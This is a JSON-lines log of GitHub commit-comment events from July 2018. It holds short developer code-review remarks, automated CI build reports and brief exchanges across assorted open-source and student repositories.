{"id":"7947703472","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29665942,"position":null,"line":null,"path":null,"commit_id":"c1ab50cc286b3839840cc7028c74d77d303b3b9e","created_at":"2018-07-11T04:31:45Z","updated_at":"2018-07-11T04:31:45Z","author_association":"OWNER","body":"Build version: __`2.1.0-renovate/jest-23.x.51`__ :crossed_fingers: [`renovate/jest-23.x`](https://github.com/streamich/nano-css/tree/renovate/jest-23.x) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/51) :tada:"}},"created_at":"2018-07-11T04:31:45Z"}
{"id":"7947706456","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29665948,"position":23,"line":179,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.cpp","commit_id":"b9fc8ae250af1d9952cc16fe93a1e97dfed35ea9","created_at":"2018-07-11T04:33:07Z","updated_at":"2018-07-11T04:33:07Z","author_association":"CONTRIBUTOR","body":"Didn't want to use std::string::assign on this one?\r\n\r\nNot trying to be a nitpick *shrug*."}},"created_at":"2018-07-11T04:33:07Z"}
{"id":"7947707109","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29665952,"position":null,"line":null,"path":null,"commit_id":"562743f94487d8a8ae17e786480edec619b804f4","created_at":"2018-07-11T04:33:26Z","updated_at":"2018-07-11T04:33:26Z","author_association":"CONTRIBUTOR","body":"넵 감사합니다."}},"created_at":"2018-07-11T04:33:26Z"}
{"id":"7947707544","type":"CommitCommentEvent","actor":{"login":"IhorShcherbyna"},"repo":{"name":"IhorShcherbyna/HomeTask3"},"payload":{"comment":{"id":29665954,"position":null,"line":null,"path":null,"commit_id":"fa792b036bd8151fcf670f7c4cd7ed0eca620ae9","created_at":"2018-07-11T04:33:37Z","updated_at":"2018-07-11T04:33:37Z","author_association":"OWNER","body":"Implemented tests and execution time tracking with listeners"}},"created_at":"2018-07-11T04:33:37Z"}
{"id":"7947707937","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665955,"position":34,"line":34,"path":"One Away.js","commit_id":"b39031211266429584cbb69189e855a93cfdcc80","created_at":"2018-07-11T04:33:49Z","updated_at":"2018-07-11T04:33:49Z","author_association":"NONE","body":"nit-picky: confusing that `let j = 0` is at the top of this function. `j` should also be declared at this scope.\r\n\r\nyou could do something like: \r\n`for (let i = 0, j = 0; i < longer.length; i++) {...}`"}},"created_at":"2018-07-11T04:33:49Z"}
{"id":"7947708694","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665956,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-11T04:34:10Z","updated_at":"2018-07-11T04:34:10Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2969 of 2971 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: BND diffs.\n * 2 tests had: MDD diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: RDD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 641\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-11T04:34:10Z"}
{"id":"7947709353","type":"CommitCommentEvent","actor":{"login":"n18023"},"repo":{"name":"n18023/programming-term2"},"payload":{"comment":{"id":29665958,"position":null,"line":null,"path":null,"commit_id":"f07237680247d444b7e79e946e125878a14d601e","created_at":"2018-07-11T04:34:26Z","updated_at":"2018-07-11T04:34:26Z","author_association":"OWNER","body":"金城先生\r\n\r\n御忙しい中失礼致します。すいません。早急に訂正致します。  平敷大賀\r\n\r\n2018년 7월 11일 (수) 오후 1:09, kinjo-icolle <notifications@github.com>님이 작성:\r\n\r\n> 修正お疲れ様です。\r\n> ちょっと結果として残念な部分が…\r\n> yakitori_w自体に0.2して計算式を変更していない結果、焼鳥が「2割引」でなく「2割(8割引)」の値段になってしまっていますね^^;\r\n>\r\n> 結果としては、paymentを計算する式の右辺のyakitori_wの部分を(1 - yakitori_w)に修正すれば正解します。\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/n18023/programming-term2/commit/f07237680247d444b7e79e946e125878a14d601e#commitcomment-29665859>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/Alf58xnj3lLISux1nGXIvdX9gVjtjQSpks5uFXppgaJpZM4VKdcT>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-11T04:34:26Z"}
{"id":"7947710028","type":"CommitCommentEvent","actor":{"login":"icodeface"},"repo":{"name":"qtumproject/qtum-electrum"},"payload":{"comment":{"id":29665959,"position":null,"line":null,"path":null,"commit_id":"a25ca311a1c4390c5865eb9030fee37416cea9e9","created_at":"2018-07-11T04:34:45Z","updated_at":"2018-07-11T04:34:45Z","author_association":"CONTRIBUTOR","body":"fix #58 "}},"created_at":"2018-07-11T04:34:45Z"}
{"id":"7947710414","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29665960,"position":25,"line":207,"path":"Source/Foundation/bsfCore/Profiling/BsProfilerGPU.h","commit_id":"b9fc8ae250af1d9952cc16fe93a1e97dfed35ea9","created_at":"2018-07-11T04:34:57Z","updated_at":"2018-07-11T04:34:57Z","author_association":"CONTRIBUTOR","body":"I thought that if profiling was disabled, you didn't want to call gProfilerGPU().beginSample() at all?\r\n\r\nAnd mSample name doesn't exist if it's disabled?\r\n\r\nYou must have fixed this in a subsequent commit before you pushed."}},"created_at":"2018-07-11T04:34:57Z"}
{"id":"7947711704","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665965,"position":46,"line":46,"path":"One Away.js","commit_id":"b39031211266429584cbb69189e855a93cfdcc80","created_at":"2018-07-11T04:35:29Z","updated_at":"2018-07-11T04:35:29Z","author_association":"NONE","body":"same comments about tests in https://github.com/micxye/45th-vice-president-usa/commit/ff48a5da8924d78764cc11eaee93fe4cf4f5fe82\r\n\r\ndefinitely add your own tests here as well. one red flag (for me) in interviews is when someone only passes the tests given to them and don't add own."}},"created_at":"2018-07-11T04:35:29Z"}
{"id":"7947712218","type":"CommitCommentEvent","actor":{"login":"jonesmz"},"repo":{"name":"GameFoundry/bsf"},"payload":{"comment":{"id":29665966,"position":11,"line":119,"path":"Source/Foundation/bsfEngine/BsApplication.cpp","commit_id":"b9fc8ae250af1d9952cc16fe93a1e97dfed35ea9","created_at":"2018-07-11T04:35:42Z","updated_at":"2018-07-11T04:35:42Z","author_association":"CONTRIBUTOR","body":"You could still make this const&, if you wanted."}},"created_at":"2018-07-11T04:35:42Z"}
{"id":"7947712466","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665967,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-11T04:35:50Z","updated_at":"2018-07-11T04:35:50Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T04:35:50Z"}
{"id":"7947714520","type":"CommitCommentEvent","actor":{"login":"xinyunh0929"},"repo":{"name":"rshelar/nodejs-docs-samples"},"payload":{"comment":{"id":29665973,"position":null,"line":null,"path":null,"commit_id":"1dc59be0e973e34a6ebd9daf8b499f9086a1c7f5","created_at":"2018-07-11T04:36:42Z","updated_at":"2018-07-11T04:36:42Z","author_association":"NONE","body":"Might need update_company_with_field_mask as well\r\n"}},"created_at":"2018-07-11T04:36:42Z"}
{"id":"7947716129","type":"CommitCommentEvent","actor":{"login":"nehaljwani"},"repo":{"name":"AnacondaRecipes/gobject-introspection-feedstock"},"payload":{"comment":{"id":29665974,"position":null,"line":null,"path":null,"commit_id":"51f2dc9e16e11f45cab6c7a803adc63e7951053e","created_at":"2018-07-11T04:37:23Z","updated_at":"2018-07-11T04:37:23Z","author_association":"MEMBER","body":"@mingwandroid This change probably breaks gstreamer"}},"created_at":"2018-07-11T04:37:23Z"}
{"id":"7947716175","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29665975,"position":11,"line":11,"path":"Longest Substring With k Distinct Chars.js","commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-11T04:37:24Z","updated_at":"2018-07-11T04:37:24Z","author_association":"NONE","body":"nice corner case checks"}},"created_at":"2018-07-11T04:37:24Z"}
{"id":"7947717843","type":"CommitCommentEvent","actor":{"login":"Artyum"},"repo":{"name":"iNavFlight/inav-configurator"},"payload":{"comment":{"id":29665979,"position":null,"line":null,"path":null,"commit_id":"4770311ef775404e677bc8c5067bbe0533804567","created_at":"2018-07-11T04:38:09Z","updated_at":"2018-07-11T04:38:09Z","author_association":"NONE","body":"The is a typo in messages.json Ground_Speed message group spped :) "}},"created_at":"2018-07-11T04:38:09Z"}
{"id":"7947718082","type":"CommitCommentEvent","actor":{"login":"ZoresK"},"repo":{"name":"ZoresK/SinegaraRep"},"payload":{"comment":{"id":29665980,"position":12,"line":49,"path":"borthel.rpy","commit_id":"fe4829732b51c891081ae7ec8f56e01d68b433e7","created_at":"2018-07-11T04:38:15Z","updated_at":"2018-07-11T04:38:15Z","author_association":"OWNER","body":"С чего вдруг эта строчка сместилась?"}},"created_at":"2018-07-11T04:38:15Z"}
{"id":"7947720137","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29665983,"position":null,"line":null,"path":null,"commit_id":"5236cb93ceae0d00e6b06e62c6e4ddf9d580a834","created_at":"2018-07-11T04:39:08Z","updated_at":"2018-07-11T04:39:08Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5236cb93ceae0d00e6b06e62c6e4ddf9d580a834-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-11T04:39:08Z"}
{"id":"7947721895","type":"CommitCommentEvent","actor":{"login":"nehaljwani"},"repo":{"name":"AnacondaRecipes/gobject-introspection-feedstock"},"payload":{"comment":{"id":29665986,"position":null,"line":null,"path":null,"commit_id":"51f2dc9e16e11f45cab6c7a803adc63e7951053e","created_at":"2018-07-11T04:39:54Z","updated_at":"2018-07-11T04:39:54Z","author_association":"MEMBER","body":"\"No rule to make target 'python', needed by 'Gst-1.0.gir'\""}},"created_at":"2018-07-11T04:39:54Z"}
{"id":"7947724984","type":"CommitCommentEvent","actor":{"login":"orbitrod"},"repo":{"name":"bentideswell/magento2-wordpress-integration"},"payload":{"comment":{"id":29665989,"position":null,"line":null,"path":null,"commit_id":"6e3293697485f3c5b317ef7949f8d7773b3ff68e","created_at":"2018-07-11T04:41:15Z","updated_at":"2018-07-11T04:41:15Z","author_association":"NONE","body":"What does disabling the Theme Integration do?  I tried it out, but didn't see any changes."}},"created_at":"2018-07-11T04:41:15Z"}
{"id":"7947729400","type":"CommitCommentEvent","actor":{"login":"Kaferusha"},"repo":{"name":"Kaferusha/api-themoviedb"},"payload":{"comment":{"id":29665997,"position":null,"line":null,"path":null,"commit_id":"9667a34a017dc102bc8075f11bf72ad90c31c803","created_at":"2018-07-11T04:43:17Z","updated_at":"2018-07-11T04:43:17Z","author_association":"OWNER","body":"in this moment release_date.gte and release_date.lte doesn't work"}},"created_at":"2018-07-11T04:43:17Z"}
{"id":"7947729509","type":"CommitCommentEvent","actor":{"login":"manoj13194"},"repo":{"name":"manoj13194/ManojAutomation"},"payload":{"comment":{"id":29665998,"position":null,"line":null,"path":null,"commit_id":"7862e847eb021d642d9ac56c3461d01fa8f74606","created_at":"2018-07-11T04:43:19Z","updated_at":"2018-07-11T04:43:19Z","author_association":"OWNER","body":"changed"}},"created_at":"2018-07-11T04:43:19Z"}
{"id":"7947732613","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29666002,"position":25,"line":25,"path":"Longest Substring With k Distinct Chars.js","commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-11T04:44:42Z","updated_at":"2018-07-11T04:44:42Z","author_association":"NONE","body":"- does `s` need to be passed in here as an argument? seems like it's never altered in this helper function\r\n- line 15 and line 18 return different types. make sure the return types are consistent. I would probably return nil here since the return value is never used (line 29)"}},"created_at":"2018-07-11T04:44:42Z"}
{"id":"7947732903","type":"CommitCommentEvent","actor":{"login":"xlanor"},"repo":{"name":"xlanor/SIM-UoW-Timetable-bot-v2"},"payload":{"comment":{"id":29666003,"position":null,"line":null,"path":null,"commit_id":"97bcde4fa74da1b8af78319e7577ddbe29af5462","created_at":"2018-07-11T04:44:51Z","updated_at":"2018-07-11T04:44:51Z","author_association":"OWNER","body":"Fixes #1 "}},"created_at":"2018-07-11T04:44:51Z"}
{"id":"7947733442","type":"CommitCommentEvent","actor":{"login":"xlanor"},"repo":{"name":"xlanor/SIM-UoW-Timetable-bot-v2"},"payload":{"comment":{"id":29666006,"position":null,"line":null,"path":null,"commit_id":"97bcde4fa74da1b8af78319e7577ddbe29af5462","created_at":"2018-07-11T04:45:05Z","updated_at":"2018-07-11T04:45:05Z","author_association":"OWNER","body":"Closes #1 "}},"created_at":"2018-07-11T04:45:05Z"}
{"id":"7947736699","type":"CommitCommentEvent","actor":{"login":"ZoresK"},"repo":{"name":"ZoresK/SinegaraRep"},"payload":{"comment":{"id":29666012,"position":null,"line":null,"path":null,"commit_id":"82a9863e3c747902e67fae1ea577153059773c79","created_at":"2018-07-11T04:46:33Z","updated_at":"2018-07-11T04:46:33Z","author_association":"OWNER","body":"Change location of class definition"}},"created_at":"2018-07-11T04:46:33Z"}
{"id":"7947742397","type":"CommitCommentEvent","actor":{"login":"BALABHASKARARAO"},"repo":{"name":"BALABHASKARARAO/jenkinsmywork"},"payload":{"comment":{"id":29666025,"position":null,"line":null,"path":null,"commit_id":"6e6ab44f066fdb916e5f56ff16cd9859c894b77d","created_at":"2018-07-11T04:49:07Z","updated_at":"2018-07-11T04:49:07Z","author_association":"OWNER","body":"fhdjkfs"}},"created_at":"2018-07-11T04:49:07Z"}
{"id":"7947747627","type":"CommitCommentEvent","actor":{"login":"Gottox"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29666033,"position":15,"line":15,"path":"srcpkgs/mbox/template","commit_id":"2ea36e362401168914b1815ecb92e584a29b9f41","created_at":"2018-07-11T04:51:25Z","updated_at":"2018-07-11T04:51:25Z","author_association":"MEMBER","body":"But if it's unstable even on the on platform it runs, why adding it in the first place?"}},"created_at":"2018-07-11T04:51:25Z"}
{"id":"7947749047","type":"CommitCommentEvent","actor":{"login":"raylee"},"repo":{"name":"eggonlea/uvc-gadget"},"payload":{"comment":{"id":29666034,"position":null,"line":null,"path":null,"commit_id":"bbff5410873a1f1026afbfc14068bebd1cc94a43","created_at":"2018-07-11T04:52:05Z","updated_at":"2018-07-11T04:52:05Z","author_association":"NONE","body":"Thank you for this. What kernel supported bulk mode successfully?"}},"created_at":"2018-07-11T04:52:05Z"}
{"id":"7947749454","type":"CommitCommentEvent","actor":{"login":"laasyapriya98"},"repo":{"name":"laasyapriya98/sample"},"payload":{"comment":{"id":29666035,"position":null,"line":null,"path":null,"commit_id":"dd267edfce3eb1efd0bfbd270d3868657a679f7d","created_at":"2018-07-11T04:52:15Z","updated_at":"2018-07-11T04:52:15Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-11T04:52:15Z"}
{"id":"7947752256","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29666037,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-11T04:53:29Z","updated_at":"2018-07-11T04:53:29Z","author_association":"NONE","body":"https://news.ycombinator.com/item?id=17497699"}},"created_at":"2018-07-11T04:53:29Z"}
{"id":"7947753533","type":"CommitCommentEvent","actor":{"login":"Aaahh"},"repo":{"name":"unixpickle/anyrl"},"payload":{"comment":{"id":29666038,"position":null,"line":null,"path":null,"commit_id":"0bdfe7d8f1313cc29b6b1d1dd8f3abf34e9861ff","created_at":"2018-07-11T04:54:01Z","updated_at":"2018-07-11T04:54:01Z","author_association":"NONE","body":"*note"}},"created_at":"2018-07-11T04:54:01Z"}
{"id":"7947754634","type":"CommitCommentEvent","actor":{"login":"unixpickle"},"repo":{"name":"unixpickle/anyrl"},"payload":{"comment":{"id":29666039,"position":null,"line":null,"path":null,"commit_id":"0bdfe7d8f1313cc29b6b1d1dd8f3abf34e9861ff","created_at":"2018-07-11T04:54:25Z","updated_at":"2018-07-11T04:54:25Z","author_association":"OWNER","body":"@Aaahh correct."}},"created_at":"2018-07-11T04:54:25Z"}
{"id":"7947755912","type":"CommitCommentEvent","actor":{"login":"domwashburn"},"repo":{"name":"semantic-release/semantic-release"},"payload":{"comment":{"id":29666043,"position":126,"line":126,"path":"index.js","commit_id":"b4440fe0d38ceb972bdda9ccb24aafb78e8b3cef","created_at":"2018-07-11T04:54:55Z","updated_at":"2018-07-11T04:54:55Z","author_association":"NONE","body":"I'm working with Travis CI which is using an old version of Git (1.8 I believe) in their build VM, so in order to use this I've needed to run it locally. \r\n\r\nHere's the error I get:\r\n\r\n``` bash\r\n[Semantic release]: There is no previous release, the next release version is 1.0.0-beta.0\r\n[Semantic release]: EINVALIDNEXTVERSION TODO\r\nTODO\r\n\r\n\r\n{ SemanticReleaseError: TODO\r\n    at module.exports (/Users/dominickwashburn/.npm/_npx/81643/lib/node_modules/semantic-release/lib/get-error.js:6:10)\r\n    at run (/Users/dominickwashburn/.npm/_npx/81643/lib/node_modules/semantic-release/index.js:129:11)\r\n    at <anonymous>\r\n    at process._tickCallback (internal/process/next_tick.js:182:7)\r\n  name: 'SemanticReleaseError',\r\n  code: 'EINVALIDNEXTVERSION',\r\n  details: 'TODO',\r\n  semanticRelease: true }\r\n```\r\nline 128 seems to get gummed up with the `-beta.x` portion of the version.\r\n\r\nWith the edits I made above (locally), I'm able to successfully prepare a release and publish to NPM. Is that helpful?"}},"created_at":"2018-07-11T04:54:55Z"}
{"id":"7947757618","type":"CommitCommentEvent","actor":{"login":"tsuckow"},"repo":{"name":"FredrikNoren/ungit"},"payload":{"comment":{"id":29666047,"position":5,"line":364,"path":"source/server.js","commit_id":"d893f3a045caa0eda6c3bfae9ee55625789c8801","created_at":"2018-07-11T04:55:33Z","updated_at":"2018-07-11T04:55:33Z","author_association":"NONE","body":"This breaks using ungit in cloud9. The IP should be configurable or use the IP environmental variable."}},"created_at":"2018-07-11T04:55:33Z"}
{"id":"7947758372","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29666048,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-11T04:55:50Z","updated_at":"2018-07-11T04:55:50Z","author_association":"NONE","body":"Nice dig here, @MattMattV. I've been searching for months for something like this. Very happy I looked at your fork. I've opened an issue here for investigation: https://git.habd.as/comfusion/after-dark/issues/1. The race is on. ;)"}},"created_at":"2018-07-11T04:55:50Z"}
{"id":"7947760531","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29666051,"position":null,"line":null,"path":null,"commit_id":"4682a775ee8f443eb151744ad2b097910a5daced","created_at":"2018-07-11T04:56:41Z","updated_at":"2018-07-11T04:56:41Z","author_association":"NONE","body":"💦"}},"created_at":"2018-07-11T04:56:41Z"}
{"id":"7947761609","type":"CommitCommentEvent","actor":{"login":"sustrik"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29666055,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-11T04:57:09Z","updated_at":"2018-07-11T04:57:09Z","author_association":"OWNER","body":"Hi, I have no real preferences here. I personally use automake and I have little experience with CMake. I'll be happy to merge in whatever you agree on."}},"created_at":"2018-07-11T04:57:09Z"}
{"id":"7947768028","type":"CommitCommentEvent","actor":{"login":"TheRoboticon"},"repo":{"name":"DynoCC/Dyno-Custom-Commands"},"payload":{"comment":{"id":29666062,"position":null,"line":null,"path":null,"commit_id":"e5833b9580faecb32a1b44b55d58b05c791a8f07","created_at":"2018-07-11T04:59:38Z","updated_at":"2018-07-11T04:59:38Z","author_association":"CONTRIBUTOR","body":"I'd say delete it, doesn't help our users."}},"created_at":"2018-07-11T04:59:38Z"}
{"id":"7947768372","type":"CommitCommentEvent","actor":{"login":"TheRoboticon"},"repo":{"name":"DynoCC/Dyno-Custom-Commands"},"payload":{"comment":{"id":29666063,"position":null,"line":null,"path":null,"commit_id":"e5833b9580faecb32a1b44b55d58b05c791a8f07","created_at":"2018-07-11T04:59:46Z","updated_at":"2018-07-11T04:59:46Z","author_association":"CONTRIBUTOR","body":"tbh i'll just delete it."}},"created_at":"2018-07-11T04:59:46Z"}
{"id":"7947768615","type":"CommitCommentEvent","actor":{"login":"EthanPui"},"repo":{"name":"EthanPui/AA-Login"},"payload":{"comment":{"id":29666064,"position":null,"line":null,"path":null,"commit_id":"0587253fe8a52c6e9f158e1e3d81c6379eebadb1","created_at":"2018-07-11T04:59:52Z","updated_at":"2018-07-11T04:59:52Z","author_association":"OWNER","body":"### Run Error Fixed \r\n\r\n**Unticked**\r\n Enable Instant Run to hot swap code/resources changes on deploy (default enabled)"}},"created_at":"2018-07-11T04:59:52Z"}
{"id":"7947770721","type":"CommitCommentEvent","actor":{"login":"EthanPui"},"repo":{"name":"EthanPui/AA-Login"},"payload":{"comment":{"id":29666073,"position":null,"line":null,"path":null,"commit_id":"97bc9970a4cc95b5388ffd6db39794bcf4973fa9","created_at":"2018-07-11T05:00:35Z","updated_at":"2018-07-11T05:00:35Z","author_association":"OWNER","body":"Fixed"}},"created_at":"2018-07-11T05:00:35Z"}
{"id":"7947775079","type":"CommitCommentEvent","actor":{"login":"yanyueding"},"repo":{"name":"Y1ran/Free-VPN-for-Coursera"},"payload":{"comment":{"id":29666084,"position":null,"line":null,"path":null,"commit_id":"c3ac9b4532d7fe6debf91c1db561a4ceb1d6a2f2","created_at":"2018-07-11T05:02:11Z","updated_at":"2018-07-11T05:02:11Z","author_association":"NONE","body":"新SSR的新节点又被墙了。。。昨天还可以用的，求跟新"}},"created_at":"2018-07-11T05:02:11Z"}
{"id":"7947778651","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29666091,"position":11,"line":11,"path":"Longest Substring With k Distinct Chars.js","commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-11T05:03:32Z","updated_at":"2018-07-11T05:03:32Z","author_association":"NONE","body":"what if `k` is negative? or `k` is greater than length of `s`?"}},"created_at":"2018-07-11T05:03:32Z"}
{"id":"7947786109","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29666110,"position":null,"line":null,"path":null,"commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-11T05:06:26Z","updated_at":"2018-07-11T05:06:26Z","author_association":"NONE","body":"FYI didn't check this one for correctness. we should go over this together IRL at some point"}},"created_at":"2018-07-11T05:06:26Z"}
{"id":"7947786353","type":"CommitCommentEvent","actor":{"login":"EthanPui"},"repo":{"name":"EthanPui/AA-Login"},"payload":{"comment":{"id":29666112,"position":null,"line":null,"path":null,"commit_id":"97bc9970a4cc95b5388ffd6db39794bcf4973fa9","created_at":"2018-07-11T05:06:31Z","updated_at":"2018-07-11T05:06:31Z","author_association":"OWNER","body":"### Run Error Fixed\r\n\r\n**Unticked**\r\nEnable Instant Run to hot swap code/resources changes on deploy (default enabled)"}},"created_at":"2018-07-11T05:06:31Z"}
{"id":"7947786413","type":"CommitCommentEvent","actor":{"login":"samerxye"},"repo":{"name":"micxye/45th-vice-president-usa"},"payload":{"comment":{"id":29666113,"position":5,"line":5,"path":"Longest Substring With k Distinct Chars.js","commit_id":"df14621f37b11962d5c6fe101831bc5c84f7e231","created_at":"2018-07-11T05:06:33Z","updated_at":"2018-07-11T05:06:33Z","author_association":"NONE","body":"not sure about this. i gotta give it some more thought. maybe a `k` could be in there somewhere."}},"created_at":"2018-07-11T05:06:33Z"}
{"id":"7947790455","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29666122,"position":null,"line":null,"path":null,"commit_id":"7c85d4a6f9252eaed827a95f5dc72e69140ba112","created_at":"2018-07-11T05:08:10Z","updated_at":"2018-07-11T05:08:10Z","author_association":"NONE","body":"issue_6729 (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2933 of 2933 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7c85d4a6f9252eaed827a95f5dc72e69140ba112-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T05:08:10Z"}
{"id":"7947795756","type":"CommitCommentEvent","actor":{"login":"DougGregor"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":29666126,"position":1,"line":1,"path":"test/Compatibility/local_types.swift","commit_id":"62d13e5842e7fa3be58a694a9c5cc1937c4c39b1","created_at":"2018-07-11T05:10:09Z","updated_at":"2018-07-11T05:10:09Z","author_association":"MEMBER","body":"I was planning to bring this up as a possible change for Swift 5, hence the Compatibility thing, but... maybe it's okay the way it is. I'll move it for now."}},"created_at":"2018-07-11T05:10:09Z"}
{"id":"7947797549","type":"CommitCommentEvent","actor":{"login":"santialferez"},"repo":{"name":"santialferez/FEAST"},"payload":{"comment":{"id":29666129,"position":5,"line":50,"path":"Makefile","commit_id":"9ec418867679c3fb8d1a60a7e5eab3d8df85ab33","created_at":"2018-07-11T05:10:50Z","updated_at":"2018-07-11T05:10:50Z","author_association":"OWNER","body":"This changes allows to use the library on a position relative to the FEAST folder (../MIToolbox), on Linux. It is similar to Windows. \r\n\r\nThe most important trick is the use of the linker through \"Wl,\" , passing \"-rpath\"  (see` man ld.so`)  with the \"magic\"  '$ORIGIN...'  (inside '', and in a makefile with double $$). It relativize the path in execution (see` man ld.so`) . "}},"created_at":"2018-07-11T05:10:50Z"}
